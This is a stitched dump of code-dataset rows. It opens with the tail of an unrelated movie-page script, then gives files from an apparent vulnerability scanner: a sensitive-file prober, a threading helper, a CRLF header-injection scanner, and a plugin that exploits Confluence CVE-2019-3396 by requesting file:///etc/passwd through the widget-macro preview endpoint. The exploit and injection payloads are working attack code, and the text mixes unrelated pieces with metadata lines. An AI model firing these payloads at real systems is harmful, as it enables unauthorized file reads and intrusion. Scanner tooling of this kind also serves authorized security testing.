    "The Shawshank Redemption",
    "Two imprisoned men bond over a number of years, "
    "finding solace and eventual redemption through "
    "acts of common decency.",
    "https://www.goldenglobes.com/sites/default/"
    "files/films/the-shawshank-redemption.jpg",
    "https://www.youtube.com/watch?v=6hB3S9bIaco")
The_GodFather = media.Movie(
    "The Godfather",
    "The aging patriarch of an organized crime dynasty transfers "
    "control of his clandestine empire to his reluctant son.",
    "http://img.zanda.com/item/57040290000061/1024x768/"
    "The_Godfather.jpg",
    "https://www.youtube.com/watch?v=sY1S34973zA")
Coco = media.Movie(
    "Coco",
    "A story of a boy enters the land of the dead to fine his great-gre"
    "at-grandfather, legendary singer.",
    "https://upload.wikimedia.org/wikipedia/en/9/98/"
    "Coco_%282017_film%29_poster.jpg",
    "https://www.youtube.com/watch?v=zNCz4mQzfEI")
""" you can add you favorite movies here
"""
# Creat the movie list for movie page
movies = [The_Shawshank_Redemption, The_GodFather, Coco]
# Creat the movie page (generates and opens the HTML in a browser)
fresh_tomatoes.open_movies_page(movies)
| {"/enterainment_center.py": ["/media.py"]} |
53,693 | alex14324/Eagel | refs/heads/main | /plugins/files.py | from utils.status import *
from .helper import Plugin,utils
from urllib.parse import urlparse
import threading
import utils.multitask as multitask
class SensitiveFiles(Plugin):
    """Scanner plugin: probe a host for sensitive files from a wordlist.

    A wordlist of paths is requested concurrently; responses are filtered
    against the line counts of the host's base page and a known-404 page to
    discard soft-404s, and surviving URLs are reported in the Result.
    """
    def __init__(self):
        self.name = "Sensitive Files"
        self.enable = True
        self.description = ""
        self.concurrent = 12  # worker count for the probe channel
        # Candidate paths, one per non-empty wordlist line.
        self.__files = [line.strip() for line in open(sys.path[0]+"/plugins/files/senstivefiles.txt").readlines() if line.strip()]
        self.__lock = threading.Lock()  # guards __found across workers
        self.__cache = {}  # per-host baseline line counts ('base'/'dummy')
        self.__found = {}  # per-host list of hit URLs
    def presquites(self, host):
        """Only scan hosts that answer HTTP at all."""
        if utils.isalive( utils.uri(host) ):
            return True
        return False
    def check(self,host,path):
        """Worker: fetch one candidate path and record it if it looks real
        (HTTP 200, line count unlike the base/404 baselines, same host)."""
        base_len = self.__cache[host]['base']
        dummy_len = self.__cache[host]['dummy']
        full = utils.uri(host) + path
        request = utils.requests.get(full, verify=False)
        if request.status_code != 200 or len(request.text.split("\n")) in [base_len, dummy_len] or not host in urlparse(request.url).hostname:
            return
        with self.__lock:
            self.__found[host].append(full)
    def main(self,host):
        """Build the host baselines, fan the wordlist out to workers, and
        return a SUCCESS Result listing any hits (FAILED otherwise)."""
        if not host in self.__cache.keys():
            self.__found.update({host: []})
            # Baselines: line counts of the front page and of a guaranteed
            # non-existent path (detects soft-404 pages).
            self.__cache.update({host:{
                'base' : len( utils.requests.get(utils.uri(host), verify=False).text.split("\n") ),
                'dummy': len( utils.requests.get(utils.uri(host) + "nofoundfile12345", verify=False ).text.split("\n") )
            }})
        channel = multitask.Channel(self.name)
        multitask.workers(self.check,channel,self.concurrent)
        for path in self.__files:
            channel.append(host,path)
        channel.wait()
        channel.close()
        if self.__found[host]:
            return Result(
                status = SUCCESS,
                msg = self.__found[host],
                request = None,
                response = None
            )
        return Result(FAILED,None,None,None)
| {"/plugins/files.py": ["/utils/status.py", "/plugins/helper.py", "/utils/multitask.py"], "/plugins/cve-2019-3396.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/crlf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spider.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py", "/utils/multitask.py"], "/plugins/cve-2019-5418.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/ftp.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py"], "/main.py": ["/utils/db.py", "/utils/status.py", "/utils/multitask.py", "/utils/console.py", "/utils/data.py", "/plugins/__init__.py"], "/plugins/traversal.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2018-11776.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-2725.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-8451.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/firebase.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/s3.py": ["/utils/decorators.py", "/plugins/helper.py", "/utils/status.py"], "/plugins/plugin.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/subtakeover.py": ["/utils/status.py", "/plugins/helper.py"], "/scripts/ping.py": ["/utils/status.py", "/utils/console.py", "/utils/multitask.py"], "/plugins/sumggler.py": ["/plugins/helper.py", "/utils/status.py", "/utils/multitask.py", "/utils/data.py"], "/utils/urls.py": ["/utils/wrappers.py", "/utils/decorators.py"], "/utils/console.py": ["/utils/status.py"], "/plugins/cve-2012-1823.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/__init__.py": ["/plugins/helper.py"], "/plugins/cve-2019-10098.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2014-6271.py": ["/utils/status.py", "/plugins/helper.py"]} |
53,694 | alex14324/Eagel | refs/heads/main | /plugins/cve-2019-3396.py | from utils.status import *
from .helper import Plugin,utils
class CVE_2019_3396(Plugin):
    """Scanner plugin for CVE-2019-3396: Atlassian Confluence widget-macro
    path traversal / local file inclusion via the tinymce macro preview."""
    def __init__(self):
        self.name = "Confluence LFI - CVE_2019_3396"
        self.enable = True
        self.description = ""
    def presquites(self, host):
        """Only scan hosts that answer HTTP at all."""
        if utils.isalive( utils.uri(host) ):
            return True
        return False
    def main(self,host):
        """POST the widget-macro preview payload pointing _template at
        /etc/passwd; a 200 response echoing passwd content proves the LFI."""
        data = '{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.google.com","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}'
        request = utils.requests.post(utils.uri(host) + "/rest/tinymce/1/macro/preview", data=data, headers={
            "User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
            "Referer" : utils.uri(host) + "/pages/resumedraft.action?draftId=1&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
            "Content-Type" : "application/json; charset=utf-8",
            'X-Atlassian-Token' : 'no-check'
        })
        if request.status_code == 200 and 'root:x:0:0:root' in request.text:
            return Result(
                status = SUCCESS,
                msg = "PWNED",
                request = utils.dump_request(request),
                response = utils.dump_response(request)
            )
        return Result(FAILED,None,None,None)
53,695 | alex14324/Eagel | refs/heads/main | /plugins/crlf.py | from utils.status import *
from .helper import Plugin,utils
class CRLF(Plugin):
    """Scanner plugin for CRLF (carriage-return / line-feed) header injection.

    Builds URLs whose path contains an encoded newline followed by the
    marker ``header:crlf``; if any response (or redirect hop) comes back
    with a header whose *value* is the literal string ``crlf``, the target
    reflected the injected line into its headers and is vulnerable to
    HTTP response splitting.
    """
    def __init__(self):
        # Plugin metadata consumed by the framework's plugin loader.
        self.name = "CRLF Scanner"
        self.enable = True
        self.description = ""
    def presquites(self, host):
        # NOTE(review): method name looks like a typo for "prerequisites",
        # but it is part of the plugin dispatch interface -- renaming it
        # would break whatever iterates plugins; leaving as-is.
        # Only scan hosts that actually respond over HTTP(S).
        if utils.isalive( utils.uri(host) ):
            return True
        return False
    def main(self,host):
        # Payloads: a plain percent-encoded CRLF, plus two multi-byte
        # sequences (%E5%98%8A / %E5%98%8D) whose UTF-8 tails contain the
        # 0x0A / 0x0D bytes -- some servers mis-decode these into real
        # newlines, bypassing naive CRLF filters.
        for payload in ["%0D%0A", "%E5%98%8A","%E5%98%8D"]:
            for scheme in utils.urlschemes(host):
                # Proof-of-concept URL: if injection works, "header: crlf"
                # becomes a real response header with value "crlf".
                poc = scheme + "://" + host + "/" + payload + "header:crlf"
                request = utils.requests.get(poc)
                # Check the final response's headers for the marker value.
                for _, value in list(request.headers.items()):
                    if value == "crlf":
                        return Result(
                            status = SUCCESS,
                            msg = poc,
                            request = utils.dump_request(request),
                            response = utils.dump_response(request)
                        )
                # The injected header may only appear on an intermediate
                # redirect hop, so walk the redirect history as well.
                if request.history:
                    for history in request.history:
                        for _, value in list(history.headers.items()):
                            if value == "crlf":
                                return Result(
                                    status = SUCCESS,
                                    msg = poc,
                                    request = utils.dump_request(request),
                                    response = utils.dump_response(request)
                                )
        # NOTE(review): if utils.urlschemes(host) ever yields nothing,
        # `request` is never bound and the fall-through return below raises
        # NameError instead of a FAILED Result -- confirm urlschemes()
        # always returns at least one scheme.
return Result(FAILED,None,utils.dump_request(request),utils.dump_response(request)) | {"/plugins/files.py": ["/utils/status.py", "/plugins/helper.py", "/utils/multitask.py"], "/plugins/cve-2019-3396.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/crlf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spider.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py", "/utils/multitask.py"], "/plugins/cve-2019-5418.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/ftp.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py"], "/main.py": ["/utils/db.py", "/utils/status.py", "/utils/multitask.py", "/utils/console.py", "/utils/data.py", "/plugins/__init__.py"], "/plugins/traversal.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2018-11776.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-2725.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-8451.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/firebase.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/s3.py": ["/utils/decorators.py", "/plugins/helper.py", "/utils/status.py"], "/plugins/plugin.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/subtakeover.py": ["/utils/status.py", "/plugins/helper.py"], "/scripts/ping.py": ["/utils/status.py", "/utils/console.py", "/utils/multitask.py"], "/plugins/sumggler.py": ["/plugins/helper.py", "/utils/status.py", "/utils/multitask.py", "/utils/data.py"], "/utils/urls.py": ["/utils/wrappers.py", "/utils/decorators.py"], "/utils/console.py": ["/utils/status.py"], "/plugins/cve-2012-1823.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/__init__.py": ["/plugins/helper.py"], "/plugins/cve-2019-10098.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2014-6271.py": ["/utils/status.py", "/plugins/helper.py"]} |
53,696 | alex14324/Eagel | refs/heads/main | /utils/multitask.py | from collections import namedtuple
import threading
import time
import signal
import sys
import types
import sys
class Channel(object):
    """A minimal multi-producer work queue shared with worker threads.

    Producers enqueue argument tuples via append(); workers drain them with
    pop().  ``jobs`` counts items queued but not yet fully processed (worker
    code decrements it externally), which is what wait() polls.  close()
    raises the ``stop`` flag that workers observe through open().
    """

    def __init__(self, name='default'):
        self.name = name           # label for this queue
        self.stop = False          # flipped True by close(); workers then exit
        self.items = []            # pending argument tuples, FIFO order
        self.jobs = 0              # queued-but-unfinished job counter
        self.__guard = threading.Lock()  # serializes updates to ``jobs``

    def append(self, *items):
        """Enqueue one job; the positional arguments form a single work item."""
        with self.__guard:
            self.jobs += 1
        self.items.append(items)

    def pop(self):
        """Dequeue the oldest item.  Returns (True, item) or (False, None)."""
        try:
            head = self.items.pop(0)
        except IndexError:
            return False, None
        return True, head

    def open(self):
        """True while the channel has not been closed."""
        return not self.stop

    def wait(self):
        """Block (by polling) until every queued job has completed."""
        while self.jobs > 0:
            time.sleep(0.25)

    def close(self):
        """Ask workers to shut down once they next check open()."""
        self.stop = True
result = namedtuple("Result","func ret args channel wid")
def _worker(wid, target, channel, lock, callback=None):
    """Worker loop: pull argument tuples off *channel* and apply *target*.

    Runs until ``channel.open()`` returns False.  Every processed item
    decrements ``channel.jobs`` (guarded by *lock*) so ``Channel.wait()``
    can unblock.  If *callback* is callable it receives one ``result``
    record per processed item.

    :param wid:      numeric id of this worker (reported in results)
    :param target:   function applied to each dequeued argument tuple
    :param channel:  Channel-like object with open()/pop() and a jobs counter
    :param lock:     threading.Lock shared by all workers on this channel
    :param callback: optional callable invoked with a ``result`` per item
    """
    while channel.open():
        ok, args = channel.pop()
        if not ok:
            # Queue momentarily empty: back off instead of spinning hot.
            time.sleep(0.50)
            continue
        try:
            retval = target(*args)
        except Exception:
            # Best-effort execution: one failing job must not kill the
            # worker thread; record no result and move on.
            retval = None
        with lock:
            channel.jobs -= 1
        # Accept any callable (plain function, bound method, functools.partial,
        # callable object).  The previous FunctionType/MethodType type check
        # silently rejected partials and callable instances.
        if not callable(callback):
            continue
        callback(
            result(wid=wid, channel=channel, func=target, args=args, ret=retval)
        )
def workers(target, channel, count=5, callback=None):
    """Spawn *count* worker threads (ids 1..count) that all drain *channel*.

    Every thread runs ``_worker`` with one shared lock so the channel's
    job counter is updated consistently across workers.
    """
    shared_lock = threading.Lock()
    for worker_id in range(1, count + 1):
        thread = threading.Thread(
            target=_worker,
            args=(worker_id, target, channel, shared_lock, callback),
        )
        thread.start()
| {"/plugins/files.py": ["/utils/status.py", "/plugins/helper.py", "/utils/multitask.py"], "/plugins/cve-2019-3396.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/crlf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spider.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py", "/utils/multitask.py"], "/plugins/cve-2019-5418.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/ftp.py": ["/utils/status.py", "/plugins/helper.py", "/utils/decorators.py"], "/main.py": ["/utils/db.py", "/utils/status.py", "/utils/multitask.py", "/utils/console.py", "/utils/data.py", "/plugins/__init__.py"], "/plugins/traversal.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2018-11776.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-2725.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2019-8451.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/spf.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/firebase.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/s3.py": ["/utils/decorators.py", "/plugins/helper.py", "/utils/status.py"], "/plugins/plugin.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/subtakeover.py": ["/utils/status.py", "/plugins/helper.py"], "/scripts/ping.py": ["/utils/status.py", "/utils/console.py", "/utils/multitask.py"], "/plugins/sumggler.py": ["/plugins/helper.py", "/utils/status.py", "/utils/multitask.py", "/utils/data.py"], "/utils/urls.py": ["/utils/wrappers.py", "/utils/decorators.py"], "/utils/console.py": ["/utils/status.py"], "/plugins/cve-2012-1823.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/__init__.py": ["/plugins/helper.py"], "/plugins/cve-2019-10098.py": ["/utils/status.py", "/plugins/helper.py"], "/plugins/cve-2014-6271.py": ["/utils/status.py", "/plugins/helper.py"]} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.